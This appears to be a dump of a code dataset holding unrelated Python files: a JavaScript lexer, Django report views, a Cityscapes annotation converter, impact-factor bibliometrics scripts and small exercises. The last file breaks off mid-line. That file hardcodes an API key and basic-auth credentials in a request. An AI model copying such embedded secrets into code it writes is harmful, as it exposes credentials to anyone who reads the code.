self.gestor_ts.aniadir_var_atributos_ts_global(indice, 'entero', 1)\n id_simbolo = self.gestor_ts.buscar_simbolo_ts(indice)\n self.gci.emite_global_no_init(Operando(1, id_simbolo['despl'], id_simbolo.lexema))\n yield Token('IDENTIFICADOR', indice, self.linea)\n\n elif accion == 'E':\n valor = char\n char = self.next_char()\n elif accion == 'F':\n valor += char\n char = self.next_char()\n elif accion == 'G':\n valor = int(valor)\n if 32767 >= valor >= 0:\n yield Token('ENTERO', valor, self.linea)\n else:\n self.gestor_err.imprime('Léxico', self.gestor_err.error_lexico[108], self.linea)\n char = None\n elif accion == 'H':\n lexema = ''\n contador = 0\n char = self.next_char()\n elif accion == 'J':\n lexema += char\n contador += 1\n char = self.next_char()\n elif accion == 'K':\n if contador <= 64:\n yield Token('CADENA', f\"'{lexema}'\", self.linea)\n char = self.next_char()\n else:\n self.gestor_err.imprime('Léxico', self.gestor_err.error_lexico[109], self.linea)\n char = None\n elif accion == 'L':\n if char in ('n', '\\\\'):\n char = '\\\\' + char\n lexema += char\n char = self.next_char()\n elif accion == 'M':\n yield Token('ARITSUMA', '', self.linea)\n elif accion == 'N':\n yield Token('ARITRESTA', '', self.linea)\n char = self.next_char()\n elif accion == 'O':\n yield Token('ARITINCRE', '', self.linea)\n char = self.next_char()\n elif accion == 'P':\n yield Token('RELIGUAL', '', self.linea)\n char = self.next_char()\n elif accion == 'Q':\n yield Token('RELDISTINTO', '', self.linea)\n char = self.next_char()\n elif accion == 'R':\n yield Token('ASIGNACION', '', self.linea)\n elif accion == 'S':\n yield Token('LOGAND', '', self.linea)\n char = self.next_char()\n elif accion == 'T':\n yield Token('LOGOR', '', self.linea)\n char = self.next_char()\n elif accion == 'U':\n yield Token('PUNTOCOMA', '', self.linea)\n char = self.next_char()\n elif accion == 'V':\n yield Token('COMA', '', self.linea)\n char = self.next_char()\n elif accion == 'W':\n yield Token('PARENTESISIZQ', '', self.linea)\n char = self.next_char()\n elif accion == 'X':\n yield Token('PARENTESISDER', '', self.linea)\n char = self.next_char()\n elif accion == 'Y':\n yield Token('LLAVEIZQ', '', self.linea)\n char = self.next_char()\n elif accion == 'Z':\n yield Token('LLAVEDER', '', self.linea)\n char = self.next_char()\n\n\nclass Token:\n\n def __init__(self, tipo, atributo, linea):\n self.tipo = tipo\n self.atributo = atributo\n self.linea = linea\n\n def __str__(self):\n return f'<{self.tipo},{self.atributo}>'\n\n\nif __name__ == '__main__':\n ts = GestorTablaSimbolo()\n err = GestorError()\n lexer = JSLexer(ts, err)\n for token in lexer.tokenize('../codigo.js'):\n print(token, 'linea', token.linea)\n ts.imprime()\n","sub_path":"src/lexico.py","file_name":"lexico.py","file_ext":"py","file_size_in_byte":7633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275557668","text":"def has_negatives(a):\n # Prep hash table and empty list to store results\n hash_table = {}\n result = []\n\n # Loop through items in array\n for i in a:\n # Keep running count; {item, count}\n hash_table[i] = 1\n\n # If items count doesn't equal zero and it's negative counter-part\n # exists in the hash table\n if i != 0 and -i in hash_table:\n # Append positive items to result list\n result.append(abs(i))\n \n\n return result\n\n\nif __name__ == \"__main__\":\n print(has_negatives([-1, -2, 1, 2, 3, 4, -4]))\n","sub_path":"hashtables/ex4/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"292211545","text":"\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n# Create your views here.\nimport json\n\nfrom django.shortcuts import render\nfrom rest_framework.generics import ListCreateAPIView\n\nfrom report.models import ReportInfo, ReportDetail\nfrom report.serializers import ReportInfoSerializer\n\n\ndef reportDetail(request):\n \"\"\"测试报告详情列表\"\"\"\n return render(request, \"app/report.html\", {\"report\": ReportInfo.objects.order_by(\"-id\")})\n\n\ndef reportCaseInfo(request):\n \"\"\"\n 每个用例详细测试报告信息,包含截图,每步用例步骤耗时\n :param request:\n :return:\n \"\"\"\n uuid = request.GET.get(\"id\", None)\n case_name = request.GET.get(\"case_name\", None)\n caseInfo = ReportDetail.objects.filter(report_uuid=uuid,\n case_name=case_name)\n for c in caseInfo:\n if c.case_step_time:\n caseTime = json.loads(c.case_step_time)\n else:\n caseTime = {\"step\": 0}\n return render(request, \"app/reportCaseInfo.html\", {\"reportCaseInfo\": caseInfo[0],\n \"caseTimeAll\": sum(caseTime.values()),\n \"caseTimeK\": json.dumps(caseTime.keys()),\n \"caseTimeV\": caseTime.values()})\n\n\ndef reportCount(request):\n \"\"\"\n 详细测试报告统计\n :param request:\n :return:\n \"\"\"\n uuid = request.GET.get(\"id\", None)\n reportInfo = ReportDetail.objects.filter(report_uuid=uuid)\n reportError = ReportDetail.objects.filter(report_uuid=uuid, result=\"失败\")\n reportDetails = ReportInfo.objects.filter(report_uuid=uuid)\n phone = set([r.phone_name for r in reportInfo])\n if uuid:\n return render(request, \"app/reportCount.html\", {\"reportInfo\": reportInfo,\n \"reportError\": reportError,\n \"phone\": phone,\n \"reportDetail\": reportDetails})\n else:\n return render(request, \"app/page_500.html\")\n\n\nclass reportInfoListView(ListCreateAPIView):\n \"\"\"\n 测试报告统计信息\n \"\"\"\n def get_queryset(self):\n queryset = ReportInfo.objects.order_by(\"-id\")[:7][::-1]\n return queryset\n\n serializer_class = ReportInfoSerializer\n","sub_path":"report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"361453825","text":"import json\nimport os\n\nimport yaml\n\nimport lib.datasets.convert_to_gaussian.cityscapes.cityscapesscripts.evaluation.instances2dict_with_polygons as cs\nimport lib.utils.boxes as bboxs_util\nimport lib.utils.segms as segms_util\n\n\nclass GSJsonFromCityscapes():\n '''\n convert cityscapes to gaussian json format\n '''\n\n def __init__(self, city_data_dir, out_dir):\n self.img_id = 0\n self.ann_id = 0\n self.city_data_dir = city_data_dir\n self.out_dir = out_dir\n\n def generate_gaussian_json(self, data_type):\n self.__get_basic_info__()\n self.__get_categories__()\n self.__get_img_ann__(data_type)\n\n json_data = {\n \"info\": self.info,\n \"vehicle_info\": self.vehicle_info,\n \"log_info\": self.log_info,\n \"categories\": self.categories,\n \"images\": self.images,\n \"annotations\": self.annotations\n }\n\n with open(os.path.join(self.out_dir, \"instances_%s2017.json\" % data_type), 'w') as jsonfile:\n jsonfile.write(json.dumps(json_data, sort_keys=True))\n\n def __get_basic_info__(self, ros_info=False):\n \"\"\"\n # get basic info such as description and vehicle/log infos .etc\n :param self:\n :param ros_info:\n :return:\n \"\"\"\n\n self.info = {\n \"year\": 2018,\n \"version\": 'test_api_v1',\n \"description\": 'convert cityscapes to gaussian dataset merging the thing & stuff tasks',\n \"contributor\": 'gaussian dl team',\n \"device\": 'cityscapes images',\n \"date_created\": '2018-08-02'\n }\n\n self.vehicle_info = [{\n \"id\": '',\n \"hardware_version\": '',\n \"software_version\": '',\n \"sensor_list\": [],\n \"sensor_frequency\": 0\n }]\n\n self.log_info = [{\n \"id\": '',\n \"type\": '',\n \"vehicle_id\": 0,\n \"location\": '',\n \"starting time\": '',\n \"end time\": ''\n }]\n\n def __get_categories__(self):\n\n self.categories = []\n self.category_dict = {}\n f = open(r'../gaussian_categories.yml', 'r')\n catseqs = yaml.load(f)\n for super, seqs in catseqs.items():\n for name, id in seqs.items():\n self.categories.append({\"supercategory\": super, \"name\": name, \"id\": id})\n self.category_dict[name] = id\n\n def __get_img_ann__(self, data_type):\n \"\"\"\n convert from cityscapes format to gaussian format\n :param data_type: val/train/test\n :return:\n \"\"\"\n\n sets = ['gtFine_val']\n ann_dirs = ['gtFine_trainvaltest/gtFine/%s' % data_type] # data_type: val/train/test\n json_name = ''\n ends_in = '%s_polygons.json'\n\n category_list = [\n 'person',\n 'rider',\n 'car',\n 'truck',\n 'bus',\n 'motorcycle',\n 'bicycle',\n 'road',\n 'sidewalk',\n 'building',\n 'wall',\n 'fence',\n 'pole',\n 'traffic sign',\n 'traffic light',\n 'vegetation',\n 'terrain',\n 'sky'\n ]\n\n for data_set, ann_dir in zip(sets, ann_dirs):\n print('Starting %s' % data_set)\n ann_dict = {}\n self.images = []\n self.annotations = []\n ann_dir = os.path.join(self.city_data_dir, ann_dir)\n for root, _, files in os.walk(ann_dir):\n for filename in files:\n if filename.endswith(ends_in % data_set.split('_')[0]):\n if len(self.images) % 50 == 0:\n print(\"Processed %s images, %s annotations\" % (\n len(self.images), len(self.annotations)))\n json_ann = json.load(open(os.path.join(root, filename)))\n image = {}\n self.img_id += 1\n image['id'] = self.img_id\n image['width'] = json_ann['imgWidth']\n image['height'] = json_ann['imgHeight']\n image['depth'] = 3\n image['device'] = 'camera'\n image['date_captured'] = ''\n image['rosbag_name'] = ''\n image['encode_type'] = 'rgb'\n image['is_synthetic'] = 'no'\n image['vehicle_info_id'] = ''\n image['log_info_id'] = ''\n image['weather'] = ''\n\n image['file_name'] = filename[:-len(\n ends_in % data_set.split('_')[0])] + 'leftImg8bit.png'\n seg_file_name = filename[:-len(\n ends_in % data_set.split('_')[0])] + \\\n '%s_labelIds.png' % data_set.split('_')[0]\n self.images.append(image)\n\n fullname = os.path.join(root, seg_file_name)\n objects = cs.instances2dict_with_polygons(\n [fullname], verbose=False)[fullname]\n\n for object_cls in objects:\n if object_cls not in category_list:\n continue # skip non-instance categories\n\n for obj in objects[object_cls]:\n if obj['contours'] == []:\n print('Warning: empty contours.')\n continue # skip non-instance categories\n\n len_p = [len(p) for p in obj['contours']]\n if min(len_p) <= 4:\n print('Warning: invalid contours.')\n continue # skip non-instance categories\n\n ann = {}\n ann['id'] = self.ann_id\n self.ann_id += 1\n ann['image_id'] = image['id']\n ann['segmentation'] = obj['contours']\n\n # map cityscapes categoty to gaussian category_dict\n if object_cls == 'sidewalk':\n ann['category_id'] = self.category_dict['pavement']\n elif object_cls == 'terrain':\n ann['category_id'] = self.category_dict['vegetation']\n else:\n ann['category_id'] = self.category_dict[object_cls]\n\n ann['iscrowd'] = 0\n ann['area'] = obj['pixelCount']\n ann['bbox'] = bboxs_util.xyxy_to_xywh(\n segms_util.polys_to_boxes(\n [ann['segmentation']])).tolist()[0]\n\n self.annotations.append(ann)\n\n\nif __name__ == '__main__':\n data_dir = '/media/pesong/e/dl_gaussian/data/cityscapes/cityscapes_ori'\n out_dir = '/media/pesong/e/dl_gaussian/data/cityscapes/4detectron/annotations'\n\n # init\n gs_json_from_city = GSJsonFromCityscapes(data_dir, out_dir)\n\n # generate val json\n gs_json_from_city.generate_gaussian_json('train')\n","sub_path":"lib/datasets/convert_to_gaussian/cityscapes/cityscapes_to_gaussian.py","file_name":"cityscapes_to_gaussian.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"575797749","text":"import os\nfrom datetime import datetime\nfrom os.path import join, exists\n\nimport matplotlib.pyplot as plt\nimport numpy\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom pandas import DataFrame\n\nplt.style.use('seaborn')\n\n\ndef clean_csv_from_jcr(folder: str):\n # Take off the first line which has the system call and params\n\n _, _, filenames = next(os.walk(folder), (None, None, []))\n print(filenames)\n output_folder = join(folder, 'output')\n if not exists(output_folder):\n os.makedirs(output_folder)\n for file_name in filenames:\n with open(join(folder, file_name), 'r')as f_in:\n lines = f_in.readlines()\n del lines[0:1]\n del lines[-2:]\n with open(join(output_folder, file_name), mode='w+') as f_out:\n f_out.writelines(lines)\n\n\ndef merge_csv(path: str):\n _, _, filenames = next(os.walk(path), (None, None, []))\n filenames = [join(path, f) for f in filenames if str.endswith(f, '.csv')]\n print(filenames)\n result_obj = pd.concat([pd.read_csv(file) for file in filenames])\n # Convert the above object into a csv file and export\n result_obj.drop(columns=['Rank', 'Eigenfactor Score', 'Total Cites'], inplace=True)\n result_obj.drop_duplicates(\"Full Journal Title\", inplace=True)\n result_obj['Journal Impact Factor'] = result_obj['Journal Impact Factor'].replace(\"Not Available\", 0)\n result_obj['Journal Impact Factor'] = result_obj['Journal Impact Factor'].replace(numpy.nan, 0)\n result_obj.to_csv(join(path, 'consolidated.csv'), index=False, encoding=\"utf-8\")\n\n\ndef read_jcr(output_folder: str):\n df = pd.read_csv(join(output_folder, 'consolidated.csv'), na_values=[\"Not Available\"])\n print(df.head(10))\n print(df.shape)\n # Removes missing impact factor\n\n\ndef merge_jif(jcr_file: str, bibliometry_file):\n jcr = pd.read_csv(jcr_file, na_values=[\"Not Available\"])\n bib = pd.read_excel(\n bibliometry_file,\n engine='openpyxl',\n )\n bib.astype({'PY': 'int32'})\n bib['SO'] = bib['SO'].str.upper()\n bib['SO'] = bib['SO'].str.replace('\\\\&', '&')\n jcr[\"Full Journal Title\"] = jcr[\"Full Journal Title\"].str.upper()\n jcr[\"Full Journal Title\"] = jcr[\"Full Journal Title\"].str.replace('\\\\&', '&')\n # print(bib['SO'])\n # print(jcr['Full Journal Title'])\n merged = pd.merge(bib, jcr, left_on='SO', right_on='Full Journal Title', how='left', validate='many_to_one')\n merged['Journal Impact Factor'] = merged['Journal Impact Factor'].replace(numpy.nan, 0)\n save_output_excel(jcr_file, merged)\n\n\ndef save_output_excel(jcr_file, merged: DataFrame):\n merged_file = join(os.path.dirname(jcr_file), \"output.xlsx\")\n print(\"Saving to {}\".format(merged_file))\n merged.to_excel(merged_file)\n # select rows with jif equals zero\n jif_not_found = merged[merged['Journal Impact Factor'] == 0]\n jif_not_found = jif_not_found['SO']\n # remove duplicated journals\n jif_not_found = jif_not_found.drop_duplicates(inplace=False)\n jif_not_found_file = join(os.path.dirname(jcr_file), \"output_not_found.xlsx\")\n print(\"Saving not found JIF to {}\".format(jif_not_found_file))\n jif_not_found.to_excel(jif_not_found_file)\n\n\ndef calculate_outliers(filepath: str):\n df = pd.read_excel(\n filepath,\n engine='openpyxl',\n )\n fic = calc_fixed_impact_factor(df)\n # box plot of the variable height\n ax = sns.boxplot(y=fic['fic'])\n q3 = fic['fic'].quantile(0.75)\n print(\"q3 = {}\".format(q3))\n # notation indicating an outlier\n outliers = fic[fic['fic'] >= q3]\n outliers.to_excel(join(os.path.dirname(filepath), \"outliers.xlsx\"))\n count_outlier = 0\n for index, row in fic.iterrows():\n if row['fic'] >= q3:\n count_outlier = count_outlier + 1\n # print(row['TI'])\n # print(\"Article:{} is outlier with {}\".format(row['TI'], row['fic']))\n ax.annotate(row['TI'], xy=(0, row['fic']), xytext=(0.05, row['fic']), fontsize=12,\n arrowprops=dict(arrowstyle='->', ec='grey', lw=2), bbox=dict(boxstyle=\"round\", fc=\"0.8\"))\n\n # xtick, label, and title\n plt.xticks(fontsize=14)\n plt.xlabel('Mean per year', fontsize=14)\n plt.title('Outliers', fontsize=20)\n plt.show()\n print(\"Outliers Found: {}\".format(count_outlier))\n\n\ndef calc_fixed_impact_factor(df):\n df['years_published'] = datetime.today().year - df['PY']\n df['years_published'][df['years_published'] < 1] = 1\n df['median citations'] = df['TC'] / df['years_published']\n df['fic'] = df['median citations'] * (1 + df['Journal Impact Factor'])\n # print(df['fic'])\n return df\n\n\ndef merge_previous_jcr(jcr_antigo, jcr):\n df_jcr = pd.read_excel(jcr,\n engine='openpyxl',\n )\n df_jcr_antigo = pd.read_excel(\n jcr_antigo,\n engine='openpyxl',\n )\n df_new = df_jcr_antigo[['SO', 'JCR']].copy()\n df_new.drop_duplicates('SO', inplace=True)\n print(df_jcr.columns)\n merged = pd.merge(df_jcr, df_new, left_on='SO', right_on='SO', how='left', validate='many_to_one')\n merged['Journal Impact Factor'] = merged['Journal Impact Factor'].replace({0: np.nan})\n merged['Journal Impact Factor'] = merged['Journal Impact Factor'].fillna(merged['JCR'])\n print(merged['Journal Impact Factor'])\n merged['Journal Impact Factor'].replace(numpy.nan, 0, inplace=True)\n merged.drop(columns=['JCR'], inplace=True)\n not_found = merged[['SO', 'Journal Impact Factor']].copy()\n not_found = not_found[not_found['Journal Impact Factor'] == 0]\n not_found.drop_duplicates('SO', inplace=True)\n not_found.to_excel(join(os.path.dirname(jcr), \"not_found1.xlsx\"))\n merged.to_excel(join(os.path.dirname(jcr), \"output.xlsx\"))\n # save_output_excel(jcr, merged)\n\n\ndef merge_manual_filled(jcr_antigo, jcr):\n df_jcr = pd.read_excel(jcr,\n engine='openpyxl',\n )\n df_jcr_antigo = pd.read_excel(\n jcr_antigo,\n engine='openpyxl',\n )\n merged = pd.merge(df_jcr, df_jcr_antigo, left_on='SO', right_on='SO', how='left', validate='many_to_one')\n merged['Journal Impact Factor'].replace(0, numpy.nan, inplace=True)\n merged['Journal Impact Factor'] = merged['Journal Impact Factor'].fillna(merged['JCR'])\n merged.drop(columns=['JCR'], inplace=True)\n merged['Journal Impact Factor'].replace(numpy.nan, 0, inplace=True)\n not_found = merged[['SO', 'Journal Impact Factor']].copy()\n not_found = not_found[not_found['Journal Impact Factor'] == 0]\n not_found.drop_duplicates('SO', inplace=True)\n\n not_found.to_excel(join(os.path.dirname(jcr), \"not_found2.xlsx\"))\n merged.to_excel(join(os.path.dirname(jcr), \"output2.xlsx\"))\n\n\ndef fill_manual_jif(input_file):\n input_folder = '/home/lauro/Documents/ana/doutorado/jcr'\n output_folder = join(input_folder, 'output')\n jcr = join(output_folder, 'output.xlsx')\n # bibliometry = join(output_folder, 'output.xlsx')\n # merge_previous_jcr(join(output_folder, 'jcr_ana.xlsx'), jcr)\n merge_manual_filled(join(output_folder, 'not_found_manual.xlsx'), join(output_folder, 'output.xlsx'))\n # merge_jif(jcr_file=jcr, bibliometry_file=bibliometry)\n\n\nif __name__ == '__main__':\n input_folder = '/home/lauro/Documents/ana/doutorado/jcr'\n output_folder = join(input_folder, 'output')\n # Limpa as linhas desnecessarias que o JCR adiciona ao CSV\n # clean_csv_from_jcr(input_folder)\n # merge_csv(output_folder)\n # read_jcr(output_folder)\n jcr = join(output_folder, 'consolidated.csv')\n bibliometry = join(output_folder, 'Database.xlsx')\n # merge_jif(jcr, bibliometry)\n # fill_manual_jif(output_folder)\n calculate_outliers(join(output_folder, 'output.xlsx'))\n","sub_path":"jcr.py","file_name":"jcr.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"167014872","text":"\"\"\"add top with activity\n\nRevision ID: 6cd2ed33f117\nRevises: 9f96f9a08b27\nCreate Date: 2018-07-25 22:46:03.733950\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '6cd2ed33f117'\ndown_revision = '9f96f9a08b27'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('activities', sa.Column('top', sa.Boolean(), nullable=True))\n op.add_column('activities', sa.Column('top_team', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('activities', 'top_team')\n op.drop_column('activities', 'top')\n # ### end Alembic commands ###\n","sub_path":"app/migrations/versions/6cd2ed33f117_add_top_with_activity.py","file_name":"6cd2ed33f117_add_top_with_activity.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"162785314","text":"# phone.py\n# 手机类\nimport time\nclass Phone:\n def __init__(self, name, price, \n CPU, screen_size):\n self.name = name\n self.price = price\n self.CPU = CPU\n self.screen_size = screen_size\n\n def startup(self):\n print(\"正在开机\")\n time.sleep(2)\n print(\"开机成功\")\n\n def shutdown(self):\n print(\"正在关机\")\n time.sleep(2)\n print(\"关机成功\")\n\n def call(self, phone_no):\n print(\"正在拨号\")\n time.sleep(1)\n print(\"正在和%s通话\" % phone_no)\n\n def send_msg(self, phone_no, msg):\n print(\"正在向%s发送信息...\" % phone_no)\n time.sleep(2)\n print(\"【%s】发送成功\" % msg)\n\n def __del__(self): # 析构方法\n print(\"__del__方法被调用\")\n\ndef fun():\n phone = Phone(\"华为\",1999.99,\n \"双核2G\", 5.5)\n print(\"fun()函数退出\")\n\nif __name__ == \"__main__\":\n myphone = Phone(\"华为\",1999.99,\n \"双核2G\", 5.5)\n fun() \n print(\"程序退出\")\n # myphone程序退出时被销毁\n\n\n \n # myphone.startup() #启动\n # myphone.call(\"13512345678\") #打电话\n # myphone.send_msg(\"13512345678\",\"你好\")\n # myphone.shutdown() #关机 ","sub_path":"2-python_opp/day03/Python_OO3/phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"565118407","text":"from datetime import datetime\nimport time\nimport random\n\nodds = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 33, 35, 37, 39, 41, 43, 45, 47, 49, 51, 53, 55, 57, 59]\nfor i in range (5):\n right_this_minute = datetime.today().minute\n if right_this_minute in odds:\n print(\"Odd minute\")\n else:\n print(\"Even minute\")\n wait_time = random.randint(0,2)\n time.sleep(wait_time)\n print(wait_time)\n","sub_path":"000562HeadFirstPy/000562_01_01_p070_Task_01_oddRandMinutes_20200224.py","file_name":"000562_01_01_p070_Task_01_oddRandMinutes_20200224.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"194707250","text":"from experiment_tool.dag import DAG\nimport random\n\n\ndef test_topological_sort():\n vertices = list(range(10))\n random.shuffle(vertices)\n edges = [(0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6), (1, 7),\n (2, 7), (3, 7), (4, 8), (5, 8), (6, 8), (7, 9), (8, 9)]\n dag = DAG(vertices, edges)\n assert check_topological_sort(dag, dag.topological_sort())\n\n\ndef check_topological_sort(dag, sorted_list):\n edges = dag.get_edges()\n order = {}\n for i in range(len(sorted_list)):\n order[sorted_list[i]] = i\n for e in edges:\n u, v = e\n if order[u] > order[v]:\n return False\n return True\n","sub_path":"tests/test_dag.py","file_name":"test_dag.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"314742165","text":"from automator import Automator\nfrom target import TargetType\n\nif __name__ == '__main__':\n # 声明货物要移动到的建筑 ID 。\n targets = {\n TargetType.Mei: 7,\n TargetType.Tie: 8,\n TargetType.MianHua: 9,\n TargetType.Sofa: 1,\n TargetType.Bag: 6,\n TargetType.Box: 2,\n TargetType.Bottle: 5,\n TargetType.ShaoJi: 4,\n }\n\n # 连接 adb 。\n instance = Automator('127.0.0.1:7555', targets)\n\n # 启动脚本。\n instance.start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"332980532","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys, getopt\nimport re\n\ndef get_anime_filename(path, prefix):\n files = os.listdir(path)\n anime_files = [file for file in files if re.search(prefix, file)]\n anime_files.sort()\n for anime in anime_files:\n print(anime)\n return anime_files\n \ndef get_sub_filename(path, suffix):\n files = os.listdir(path)\n sub_files = [file for file in files if file.endswith(suffix)]\n sub_files.sort()\n for sub in sub_files:\n print(sub)\n return sub_files \n\nif __name__ == '__main__':\n path = r'F:/Anime/女皇之刃/'\n prefix = r'[Queen`s Blade - Gyokuza o Tsugu Mono][BDrip][1920x1080][\\d\\d'\n anime_files = get_anime_filename(path, prefix)\n \n suffix = '.ass'\n sub_files = get_sub_filename(path, suffix)\n \n if len(anime_files) != len(sub_files):\n print(\"Fuck!!!!! length error!!!\")\n\n for anime, sub in zip(anime_files, sub_files):\n newname = anime[:-4] + '.ass'\n print(\"newname: \", newname)\n os.rename(os.path.join(path, sub), os.path.join(path, newname))","sub_path":"动漫字幕重命名.py","file_name":"动漫字幕重命名.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"289526912","text":"import re\ndef recursion(degree,list,start,end,answer):\n if answer.__len__()==degree:\n answerlist.append(answer[:])\n return\n for i in range(start,end):\n answer.append(str(list[i]))\n recursion(degree,list,i+1,end,answer)\n answer.remove(str(list[i]))\ntimes=int(input())\nfor i in range(times):\n n=int(input())\n nums=re.split('[^0-9]',input())\n print(nums)\n nums=[int(x) for x in nums]\n answerlist = []\n recursion(4,nums,0,n,[])\n index = []\n result=[]\n for j in range(answerlist.__len__()):\n x=answerlist[j]\n x=[int(xx) for xx in x]\n x.sort()\n if (x[0]+x[3])==(x[1]+x[2]):\n equal=x[0]+x[3]\n for k in range(4):\n index.append(nums.index(x[k]))\n index.sort()\n for k in range(2,4):\n if nums[index[0]]+nums[index[k]]==equal:\n swap=index[1]\n index[1]=index[k]\n index[k]=swap\n if index[2]>index[3]:\n swap=index[2]\n index[2]=index[3]\n index[3]=swap\n index = [str(x) for x in index]\n result.append(\"\".join(index))\n index=[]\n result.sort()\n if result.__len__()==0:\n print(\"no pairs\")\n else:\n print(\" \".join(list(result[0])))","sub_path":"Code/CodeRecords/2593/60677/264127.py","file_name":"264127.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599179062","text":"from expdesign import *\nfrom plotting import *\n\nexact = eig_marginal(4, 0.5, 0.4)\n\nneval = 8\nnratio = 5\n\nalgos = [\"prior\", \"mis\", \"exact\"]\nlws = {\"prior\": 2, \"mis\": 1}\nlabels = [\"1:100\", \"1:10\", \"1:1\", \"10:1\", \"100:1\"]\ncolors = [\"#e41a1c\", \"#ff7f00\", \"#4daf4a\", \"#377eb8\", \"#984ea3\", \"#666666\"]\n\nM = np.genfromtxt(\"expdesign/out/mse_fraction_M\")\nN = np.genfromtxt(\"expdesign/out/mse_fraction_N\")\nevals = 2 * M * N\n\nmat = {}\n\nfig = plt.figure()\nfig.set_size_inches(5, 5)\nfor algo in [\"prior\", \"mis\"]:\n mat[algo] = np.zeros((neval - 2, nratio * 2))\n columns = []\n ax = plt.gca()\n ax.set_xscale(\"log\")\n ax.set_yscale(\"log\", nonposy=\"clip\")\n for i in range(nratio):\n x = np.zeros(neval)\n y = np.zeros(neval)\n y_err = np.zeros(neval)\n for j in range(neval):\n x[j] = evals[i, j]\n data = get_eig(\"expdesign/out/mse_ratio_%s_%02d_%02d\" % (algo, i, j))\n y[j], y_err[j] = mse(data, exact)\n plt.errorbar(\n x[2:],\n y[2:],\n y_err[2:],\n color=colors[i],\n label=labels[i],\n lw=lws[algo],\n fmt=\"-\",\n elinewidth=0.5,\n capthick=0.5,\n capsize=2,\n barsabove=True,\n )\n mat[algo][:, i * 2] = x[2:]\n mat[algo][:, i * 2 + 1] = y[2:]\n columns += [\"x%d\" % i, \"y%d\" % i]\n np.savetxt(\n \"plot_data/ratios_%s.csv\" % (algo),\n mat[algo],\n delimiter=\",\",\n header=\",\".join(columns),\n comments=\"\",\n )\n\nlabel_styles = [plt.Line2D((0, 1), (0, 0), color=\"#ffffff\", linestyle=\"-\", linewidth=1)]\nlabel_styles += [\n plt.Line2D((0, 1), (0, 0), color=colors[i], linestyle=\"-\", linewidth=2)\n for i in range(nratio)\n]\nlabel_styles += [\n plt.Line2D((0, 1), (0, 0), color=\"#ffffff\", linestyle=\"-\", linewidth=1)\n]\nlabel_styles += [\n plt.Line2D((0, 1), (0, 0), color=\"#ffffff\", linestyle=\"-\", linewidth=1)\n]\nlabel_styles += [\n plt.Line2D((0, 1), (0, 0), color=colors[i], linestyle=\"-\", linewidth=1)\n for i in range(nratio)\n]\nlabels = [\"Prior\", \"1:100\", \"1:10\", \"1:1\", \"10:1\", \"100:1\"]\nlabels += [\"\", \"MIS\", \"1:100\", \"1:10\", \"1:1\", \"10:1\", \"100:1\"]\nplt.legend(\n label_styles,\n labels,\n bbox_to_anchor=(1.05, 1),\n loc=2,\n borderaxespad=0.0,\n numpoints=1,\n prop={\"size\": 10},\n)\n\n\n# plot_loglines(3, 6, -3, 2)\nplt.xlim([10 ** 3.8, 10 ** 6.05])\nplt.ylim([10 ** -4.0, 300])\n\nax = plt.gca()\nax.yaxis.grid(False, linestyle=\"-\", which=\"major\", color=\"#333333\", alpha=0.2)\nax.xaxis.grid(False, linestyle=\"-\", which=\"major\", color=\"#333333\", alpha=0.2)\n\nplt.ylabel(r\"Estimator MSE\")\nplt.xlabel(r\"Model evaluations\")\n\nplt.savefig(\"expdesign/plots/mse_ratio.pdf\", bbox_inches=\"tight\")\n","sub_path":"expdesign/mse_ratio_post.py","file_name":"mse_ratio_post.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"35405382","text":"import requests\nfrom datetime import datetime, timedelta\nimport json\nfrom itertools import islice\nfrom math import radians, cos, sin, asin, sqrt\n\napiKey = \"phnvlDweeuDLvjSqCqre9mOzvKKdzMmw\"\n\n# Pega a lista de aeroportos\nairport_list_response = requests.get('http://stub.2xt.com.br/air/airports/phnvlDweeuDLvjSqCqre9mOzvKKdzMmw', auth=('helcio', 'sejvlD'))\nairport_list = json.loads(airport_list_response.text)\n\n# Separa a lista em 2 listas de 20 aeroportos\nairport_list1 = dict(islice(airport_list.items(), 0, 20))\nairport_list2 = dict(islice(airport_list.items(), 40, 60))\n\n\n# Definicao da data\ndate = datetime.now() + timedelta(days=40)\ndate = 